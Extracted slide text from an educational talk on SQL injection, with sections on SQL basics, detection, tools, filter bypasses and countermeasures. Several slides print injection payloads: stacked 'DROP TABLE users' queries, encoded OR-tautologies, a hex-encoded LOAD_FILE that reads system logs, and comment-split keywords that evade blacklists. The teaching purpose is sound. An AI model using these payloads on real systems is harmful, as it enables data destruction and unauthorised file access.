SQL Inections Issa

7/28/2019 SQL Inections Issa

1/31

6/21/2013SQL Injections Intro.Greg Bugaj, SCJP

ISSADC 405


2/31

2

Disclaimer

What are SLQ Injection

Into to SQL

Attack Vectors

Bypassing filters Demos

Countermeasures

Questions

Agenda


3/31

3

Disclaimer

All code shown today is for educational and research

purposes only

In many countries it is illegal to use this type of attack Demonstrated Website owners have been notified of

the problem


4/31


5/31


6/31

6

Basic SQL

Select

Insert

Update

DeleteUnion

SQL statement breakdown


7/31

7

SQL - Select

1. Select Information from a table

SELECT * FROM table where field=1


8/31

8

SQL - Insert

1. Add new records to database

INSERT INTO tablename (id, name) values(10, Greg)


9/31

9

SQL - Update

1. Updating existing records

UPDATE table set fieldA=123 WHERE somefield=2323

UPDATE table set fieldB=Greg


10/31

10

SQL - Delete

1. Delete records

DELETE FROM tableA where somefield=1221

DELETE FROM tableA


11/31


12/31

12

Terminators

; Semi colon ends current SQL query and starts a new one

SELECT * FROM users ; DROP TABLE users

Stacked Query

-- Double dash ignores remaining query string Select * FROM users --limit 10

Can be used in conjunction

SELECT * FROM users WHERE id=''; DROP TABLE users; -- '

AND password=''


13/31

13

Where Clause Pruning

Powerful SQL technique

SQL trick for allowing a query to return either a full

set or a specified subset

1=1 == TRUE

SELECT * FROM users

WHERE (id = :id) OR (-1 = :id))


14/31

14

SQL Injection Cause

Executed via front end of the Web Application

GET URL parameter

http://host.com/item.php?cat=1&id=11

Form POST fields


15/31

15

Techniques

Normal SQL Injections

Errors & Exception

Unexpected output

O'Reilly != O\'Reilly

Blind SQL Injections

No errors

A lot of guesswork

Introduction of a delay as part of a malicious SQL statement


16/31

16

SQL Injection Types

Passive

Exposing database information

Information retrieval

Active

Altering database information

Insertion

Deletion


17/31

17

Testing for Vulnerability

Manual

Time consuming

Automated SQL injection scanners only scan for known

vulnerabilities

Google

Incorrect syntax near


18/31

18

Toolbox

SQLIer

SQLbftools

SQLibf

SQLBrute

BobCat

SQLMap

Absinthe

SQL Injection Pen-testing Tool

SQID

SQLNinja FJ-Injector Framwork

Automagic SQL Injector

NGSS SQL Injector


19/31

19

Identifying Vulnerable Site

Given unexpected input site behaves oddly

Single Quote

Double Quote

1 Single Quote one

a Single Quote a ; Single Quote semicolon

Input > Satans little minion

Nothing found forSatan\s little minion You have an error in your SQL syntax; check the manual that

corresponds to your MySQL server version for the right

syntax to use near '\'


20/31


21/31

21

Bypassing Filters

Escaping entities

%26%23039 == ' == (single quote)

%26 == &

%23 == #

039 Entity number

Select * FROM users WHERE username=secret%26%23039 OR%26%23039X%26%23039=%26%23039X

Evaluated as > Select * FROM users WHERE username=secret OR X = X

This evaluates to always true

Char function

Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115

)

Select * from users

Concat & Hex functions

CONCAT('0x', HEX('/var/log/messages'))

0x2F7661722F6C6F672F6D65737361676573


22/31

22

Bypassing Filters

Injecting AND 1=(SELECT

LOAD_FILE('var/log/messages') )

MySQL Error'\'var/log/messages\') ) limit 5 = 1

order by average desc limit 10' at line 1)


23/31

23

Bypassing Filters

1=(SELECT LOAD_FILE('var/log/messages') )

MySQL Error: 1064 (You have an error in your SQL syntax; check themanual that corresponds to your MySQL server version for the right

syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average

desc limit 10' at line 1)

Char

Hex

1=(SELECT

LOAD_FILE(0x2F7661722F6C6F672F6D65737361676573)


24/31

24

Bypassing Blacklists

What are Blacklists

Blacklist (DELETE, EXEC)

DEL/**/ETE

/**/ D/**EVIL**/ELE/**/TE


25/31

25

Escape Characters

%26%23039 OR

%26%23039X%26%23039=%26%23039X

OR X = X


26/31

26

Demos

Prerecorded demos


27/31

27

Countermeasures

System Administrators

White List / Blacklist Input Validation

Least Privileges

Application firewalls

Developer

Stored Procedures Parameterized queries

Exception handling


28/31


29/31

29

Least Privileges

Enforce least privileges

CREATE / DELETE

Does not guarantee security

Access to portion of data

Create views


30/31

30

Application Firewalls

Software

Easy to install and maintain

Hardware

Expensive

Plug and Play

Examples:

dotDefender

webApp.SECURE SonicWALL

WatchGuard


31/31

31

References

http://www.owasp.org/index.php/OWASP_Testing_Guide_Ap

pendix_C:_Fuzz_Vectors#Passive_SQL_Injection_.28SQP.29

http://upload.wikimedia.org/wikipedia/en/a/aa/SQL_ANATOMY_wiki.svg

http://www.cisco.com/web/about/security/intelligence/sql_injec

tion.html
http://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectorshttp://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectorshttp://upload.wikimedia.org/wikipedia/en/a/aa/SQL_ANATOMY_wiki.svghttp://upload.wikimedia.org/wikipedia/en/a/aa/SQL_ANATOMY_wiki.svghttp://www.cisco.com/web/about/security/intelligence/sql_injection.htmlhttp://www.cisco.com/web/about/security/intelligence/sql_injection.htmlhttp://www.cisco.com/web/about/security/intelligence/sql_injection.htmlhttp://www.cisco.com/web/about/security/intelligence/sql_injection.htmlhttp://upload.wikimedia.org/wikipedia/en/a/aa/SQL_ANATOMY_wiki.svghttp://upload.wikimedia.org/wikipedia/en/a/aa/SQL_ANATOMY_wiki.svghttp://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectorshttp://www.owasp.org/index.php/OWASP_Testing_Guide_Appendix_C:_Fuzz_Vectors

Documents

SQL Inections Issa